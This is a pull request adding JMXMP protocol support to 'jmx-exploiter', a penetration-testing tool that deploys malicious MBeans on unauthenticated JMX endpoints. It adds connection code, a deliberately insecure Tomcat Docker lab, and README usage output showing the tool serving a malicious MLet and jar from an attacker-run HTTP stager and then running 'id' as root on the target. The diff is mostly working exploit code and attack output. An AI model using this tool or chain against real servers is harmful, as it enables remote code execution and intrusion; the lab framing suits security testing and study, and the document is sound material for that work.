### PR TITLE
Feat/1 add jmxmp support

### DIFF
--- a/.docker/Dockerfile
+++ b/.docker/Dockerfile
@@ -1,0 +1,23 @@
+FROM tomcat:9-alpine
+
+# Install required packages
+RUN set -ex \
+    && apk update \
+    && apk add git \
+    && apk add maven \
+    && apk add openjdk8
+
+# Build JMXMP Agent
+RUN set -ex \
+    && mkdir /opt \
+    && git clone https://github.com/nickman/JMXMPAgent /opt/JMXMPAgent \
+    && cd /opt/JMXMPAgent/agent && mvn clean package
+
+# Copy local resources
+COPY ./resources/tomcat-users.xml /usr/local/tomcat/conf/tomcat-users.xml
+COPY ./resources/context.xml /usr/local/tomcat/webapps/manager/META-INF/context.xml
+COPY ./resources/start.sh /opt/start.sh
+
+WORKDIR /
+RUN chmod +x /opt/start.sh
+CMD ["/opt/start.sh"]

--- a/.docker/Dockerfile
+++ b/.docker/Dockerfile
@@ -20,4 +20,4 @@ COPY ./resources/start.sh /opt/start.sh
 
 WORKDIR /
 RUN chmod +x /opt/start.sh
-CMD ["/opt/start.sh"]
+CMD ["bash", "/opt/start.sh"]

--- a/.docker/README.md
+++ b/.docker/README.md
@@ -1,7 +1,9 @@
 ## Docker Container
 
 If you want to test *jmx-exploiter*, you can do this using the docker container provided in this repository.
-The *docker-compose.yml* file in this folder starts a *tomcat9* server with JMX enabled and ready to go. 
+The *docker-compose.yml* file in this folder builds a docker container based on the *tomcat9-alpine* image.
+The server has JMX enabled and also provides a JMXMP listener. Shout-outs go to [nickman](https://github.com/nickman)
+for providing a [JMXMPAgent implementation](https://github.com/nickman/JMXMPAgent).
 
 
 ### Configuration Details
@@ -19,6 +21,7 @@ The *docker-compose.yml* file in this folder starts a *tomcat9* server with JMX 
 Please notice that the container starts on a fixed ip address. When starting the container without a fixed
 address and without the **hostname** option, the rmi registry redirects the JMX query always to 127.0.0.1.
 Not sure how to fix this in a better way than setting a fixed ip address, but this should work as a workaround.
+The JMXMP listener will start on port 8888.
 
 Notice that the **docker-compose.yml** file does not map any container ports to your docker host system. Therfore, you
 have to target the ip address of the docker container directly to connect to the exposed services.

--- a/.docker/docker-compose.yml
+++ b/.docker/docker-compose.yml
@@ -1,17 +1,19 @@
-version: '3'
+version: '3.7'
 
 services:
-
   tomcat:
-    image: tomcat:9-alpine
+    image: qtc/tomcat-jmxmp
+    build: .
     environment:
       - CATALINA_OPTS=-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.local.only=false -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.port=9010 -Dcom.sun.management.jmxremote.rmi.port=9010 -Djava.rmi.server.hostname=172.30.0.2 -Dcom.sun.management.jmxremote.ssl=false
     volumes: 
       - ./resources/tomcat-users.xml:/usr/local/tomcat/conf/tomcat-users.xml
       - ./resources/context.xml:/usr/local/tomcat/webapps/manager/META-INF/context.xml
+      - ./resources/start.sh:/opt/start.sh
     networks:
       tomcat_net:
         ipv4_address: 172.30.0.2
+    init: true
 
 networks:
   tomcat_net:

--- a/.docker/resources/start.sh
+++ b/.docker/resources/start.sh
@@ -1,0 +1,26 @@
+#!/bin/bash
+
+cd /usr/local/tomcat && ./bin/startup.sh
+
+echo "[+] Looking for tomcat PID..."
+
+TOMCATPID=$(ps  | grep /usr/lib/jvm/java-1.8-openjdk/jre/bin/java | grep -o '[0-9]\+' | head -n 1)
+
+re='^[0-9]+$'
+if ! [[ $TOMCATPID =~ $re ]]; then
+	echo "[-] Failed to find tomcat PID."
+	echo "[-] Stopping execution."
+	exit 1
+fi
+
+echo "[+] Found tomcat PID at ${TOMCATPID}."
+echo "[+] Pausing for 10 seconds."
+sleep 10
+
+
+echo "[+] Attaching JMXMP Agent to tomcat instance..."
+java -jar /opt/JMXMPAgent/agent/target/helios-jmxmp-agent-1.0-SNAPSHOT.jar -install $TOMCATPID 8888:0.0.0.0:DefaultDomain
+
+echo "[+] Finished container startup."
+echo "[+] Reading logs..."
+tail -f logs/catalina.out

--- a/README.md
+++ b/README.md
@@ -45,7 +45,7 @@ Then, clone the *jmx-exploiter* project in a location of your choice and run ``m
 
 Since the main purpose of *jmx-exploiter* is the deployment of malicious *MBean* objects, you need also a corresponding *MBean* object.
 Theoretically you can deploy any *MBean* object that fulfills the *MBean Specifications*. However, this project does also provide a reference
-implementation, the [tonka-bean](./tonka-bean/). The *tonka-bean* is a seperate maven project and you can compile it in the same way as
+implementation, the [tonka-bean](./tonka-bean/). The *tonka-bean* is a separate maven project and you can compile it in the same way as
 you compiled *jmx-exploiter*:
 
 ```bash
@@ -206,7 +206,70 @@ but if *MLet* was not available when you started, you should also remove the *ML
 [+] Unregister MBean 'MLet'... done!
 ```
 
-Now the *JMX* endpoint should be clean again and *MLet* and your malicous *MBean* should be removed.
+Now the *JMX* endpoint should be clean again and *MLet* and your malicious *MBean* should be removed.
+
+
+### JMXMP Support
+
+-----
+
+Recently I tested a host system that had a JMXMP (JMX Messaging Protocol) listener running. JMXMP is just an alternate way to access a JMX agent and differs in some
+points from the Java RMI access as described above. However, for the purpose of this tool, these differences do not really matter. The important thing is that also 
+the JMXMP connector can allow unauthenticated connections and it is also possible to use the **MLet MBean** over this connector. 
+
+The required classes for the JMXMP connector can be found inside a *.jar* file called *jmxremote_optional.jar*. Unfortunately, this *.jar* does not has its own project
+on Maven anymore (it seems like it was an artifact of the JMX project once, but was removed for some reason). Now, it can be loaded as an artifact of other projects.
+*jmx-exploiter* supports the JMXMP protocol by using the *jmxremote-optional* artifact from *org.glassfish.external*. 
+
+In order to test the JMXMP support, the provided [docker-image](./.docker/) does also open a JMXMP listener on port 8888. Shout out to [nickman](https://github.com/nickman)
+who provided the [JMXMP Agent](https://github.com/nickman/JMXMPAgent) implementation. This project made the setup of JMXMP really simple. The following listing shows
+just the same examples as above, but this time using the JMXMP protocol:
+
+```
+[pentester@kali target]$ ./jmx-exploiter.jar --jmxmp -sh 172.30.0.1 172.30.0.2 8888 status
+[+] Connecting to JMX server... done!
+[+] Creating MBeanServerConnection... done!
+[+]
+[+] Getting Status of MLet... done!
+[+]	MLet is not registered on the JMX server.
+[+] Getting Status of malicious Bean... done!
+[+]	malicious Bean is not registered on the JMX server.
+[pentester@kali target]$ ./jmx-exploiter.jar --jmxmp -sh 172.30.0.1 172.30.0.2 8888 deployAll
+[+] Connecting to JMX server... done!
+[+] Creating MBeanServerConnection... done!
+[+]
+[+] Creating MBean 'MLet' for remote deploymet... done!
+[+]
+[+] Malicious Bean seems not to be registered on the server
+[+] Starting registration process
+[+] 	Creating HTTP server on 172.30.0.1:8080
+[+] 		Creating MLetHandler for endpoint /mlet... done!
+[+] 		Creating JarHandler for endpoint /tonka-bean.jar... done!
+[+]		Starting the HTTP server... done!
+[+]
+[+] 	Received request for /mlet
+[+] 	Sending malicious mlet:
+[+]
+[+] 		Class:		de.qtc.tonkabean.TonkaBean
+[+] 		Archive:	tonka-bean.jar
+[+] 		Object:		MLetTonkaBean:name=TonkaBean,id=1
+[+] 		Codebase:	http://172.30.0.1:8080
+[+]
+[+] 	Received request for /tonka-bean.jar
+[+] 	Sending malicious jar file... done!
+[+]
+[+] malicious Bean was successfully registered
+[pentester@kali target]$ ./jmx-exploiter.jar --jmxmp -sh 172.30.0.1 172.30.0.2 8888 execute
+[+] Connecting to JMX server... done!
+[+] Creating MBeanServerConnection... done!
+[+]
+[+] Sending command 'id' to the server... done!
+[+] Servers answer is: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
+```
+
+Also notice that you can use *jconsole* to connect to a running JMX agent via JMXMP. Instead of simply specifying the host and port number for the connection, 
+you have to use the JMXMP service URI ``service:jmx:jmxmp://<JMXMPHOST>:<JMXMPPORT>`` and you have to make sure that the *jmxremote_optional.jar* is inside your
+classpath.
 
 
 ### Advanced Usage
@@ -235,7 +298,7 @@ objectName=MLetTonkaBean:name=TonkaBean,id=1
 
 In situations where the server cannot access your host because of restrictive firewall rules, you may be able to use the ``--remoteStager`` option to specify a remote stager host.
 If you have access to the *remoteStager*, you can also use *jmx-exploiter* from there by using the ``--stagerOnly`` option, which only spawns the HTTP listener. When using this option,
-no additional command line paramaters are required. However, you still need to specify the correct stager host, either by using command line options or a configuration file.
+no additional command line parameters are required. However, you still need to specify the correct stager host, either by using command line options or a configuration file.
 
 
 ### Why jmx-exploiter
@@ -246,8 +309,12 @@ The reader might argue that there are already many pre existing tools that suppo
 bit superfluous. Well, while it is generally correct that there exist already many tools for this kind of exploitation (the most famous one is probably *Metasploit*), all these
 other tools are missing the flexibility that *jmx-exploiter* provides. The *MBeans* that are used by other tools are often just binary blobs that are designed to achieve one 
 specific task, like a reverse shell. *jmx-exploiter* and the *tonka-bean* reference implementation of a malicious *MBean* enable you to create and deploy your own *MBeans* on the fly. 
-Furthermore, the code of the *tonka-bean* is available in plain Java and compilation is done by your own. You can determine exactly what the *MBean* is doing and no surprising 
-side effects can occur. 
+Furthermore, the code of the *tonka-bean* is available in plain Java and compilation is done on your own. You can determine exactly what the *MBean* is doing, modify things that
+you do not like, extend the *MBean* and you are safe from surprising side effects. 
+
+*jmx-exploiter* does support the JMXMP protocol. Beside Java RMI, JMXMP represents a second popular method to communicate with a running JMX agent. In contrast to the RMI approach, 
+JMXMP does not require an additional registry service and is therefore a good solution on restrictive fire-walled host systems. While other tools focus usually on the RMI access method,
+*jmx-exploiter* supports both for a maximum flexibility.
 
 Finally, I did not find any tool that supports a cleanup operation after the exploitation is done. E.g. Metasploit leaves an ugly named *MBean* inside of 
 the *JMX* interface, that can be accessed by anyone. This could be annoying for customers and is just bad practice. With the undeploy feature of *jmx-exploiter* you can 
@@ -258,4 +325,5 @@ restore the clean state of the *JMX* endpoint.
 
 -----
 
-The initial idea and also the initial codebase of the tool were taken from [this blogpost](https://www.optiv.com/blog/exploiting-jmx-rmi).
+* The initial idea and also the initial codebase of the tool were taken from [this blogpost](https://www.optiv.com/blog/exploiting-jmx-rmi).
+* For the JMXMP implementation, the tools provided by [nickman](https://github.com/nickman) were really helpful.

--- a/pom.xml
+++ b/pom.xml
@@ -30,6 +30,12 @@
             <scope>test</scope>
         </dependency>
 
+        <dependency>
+            <groupId>org.glassfish.external</groupId>
+            <artifactId>opendmk_jmxremote_optional_jar</artifactId>
+            <version>1.0-b01-ea</version>
+        </dependency>
+
     </dependencies>
 
     <build>

--- a/src/GreenGrocer.java
+++ b/src/GreenGrocer.java
@@ -34,31 +34,35 @@ public class GreenGrocer {
         this.beanName = new ObjectName(this.objectName);
     }
 
-    public void connect(String host, int port, String username, String password, String boundName) 
+    public void connect(String host, int port, String username, String password, String boundName, boolean jmxmp) 
     {
-      try {
-          /* Setup of the credentials and the service URL */
-          HashMap<String, String[]> environment = new HashMap<String, String[]>();
-          String[] credentials = new String[] {username, password};
-          environment.put(JMXConnector.CREDENTIALS, credentials);
-          JMXServiceURL jmxUrl = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + host + ":" + port +  "/" + boundName);
+        try {
+            /* Setup of the credentials and the service URL */
+            HashMap<String, String[]> environment = new HashMap<String, String[]>();
+            String[] credentials = new String[] {username, password};
+            environment.put(JMXConnector.CREDENTIALS, credentials);
 
-          /* Connection Attempt */
-          System.out.print("[+] Connecting to JMX server... ");
-          JMXConnector jmxConnector = JMXConnectorFactory.connect(jmxUrl, environment);
-          System.out.println("done!");
+            JMXServiceURL jmxUrl = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + host + ":" + port +  "/" + boundName);
+            if( jmxmp ) {
+                jmxUrl = new JMXServiceURL("service:jmx:jmxmp://" + host + ":" + port);
+            }
 
-          /* Generate MBeanServerConnection */
-          System.out.print("[+] Creating MBeanServerConnection... ");
-          this.mBeanServer = jmxConnector.getMBeanServerConnection();
-          System.out.println("done!\n[+]");
+            /* Connection Attempt */
+            System.out.print("[+] Connecting to JMX server... ");
+            JMXConnector jmxConnector = JMXConnectorFactory.connect(jmxUrl, environment);
+            System.out.println("done!");
 
-      /* If any of the above one failes, we can terminate the program */
-      } catch( Exception e ) {
-          System.out.println("failed!");
-          System.out.println("[-] Exception was thrown: " + e.toString() + "\n");
-          System.exit(1);
-      }
+            /* Generate MBeanServerConnection */
+            System.out.print("[+] Creating MBeanServerConnection... ");
+            this.mBeanServer = jmxConnector.getMBeanServerConnection();
+            System.out.println("done!\n[+]");
+
+        /* If any of the above one failes, we can terminate the program */
+        } catch( Exception e ) {
+            System.out.println("failed!");
+            System.out.println("[-] Exception was thrown: " + e.toString() + "\n");
+            System.exit(1);
+        }
     }
 
     public void registerMLet() 

--- a/src/JmxExploiter.java
+++ b/src/JmxExploiter.java
@@ -38,6 +38,10 @@ public class JmxExploiter {
         remoteStager.setRequired(false);
         options.addOption(remoteStager);
 
+        Option jmxmp = new Option("j", "jmxmp", false, "use the JMXMP protocol instead of Java RMI");
+        jmxmp.setRequired(false);
+        options.addOption(jmxmp);
+
         Option configOption = new Option("c", "config", true, "path to a configuration file");
         configOption.setRequired(false);
         options.addOption(configOption);
@@ -100,6 +104,7 @@ public class JmxExploiter {
 
         boolean stagerOnlyValue = commandLine.hasOption("stagerOnly");
         boolean remoteStagerValue = commandLine.hasOption("remoteStager");
+        boolean jmxmpValue = commandLine.hasOption("jmxmp");
         String cmd = commandLine.getOptionValue("exec", config.getProperty("defaultCmd"));
         String userNameValue = commandLine.getOptionValue("username", config.getProperty("username"));
         String passwordValue = commandLine.getOptionValue("password", config.getProperty("password"));
@@ -147,7 +152,7 @@ public class JmxExploiter {
             System.out.println("[-] Error - Remote port has to be a numeric value!");
         }
 
-        gg.connect(remoteHost, remotePortNumeric, userNameValue, passwordValue, boundNameValue);
+        gg.connect(remoteHost, remotePortNumeric, userNameValue, passwordValue, boundNameValue, jmxmpValue);
 
         switch( action ) {
             case "status":


### PR DESCRIPTION
Implemented as requested in issue #1. *jmx-exploiter* now supports tje JMXMP protocol using the ``--jmxmp`` switch.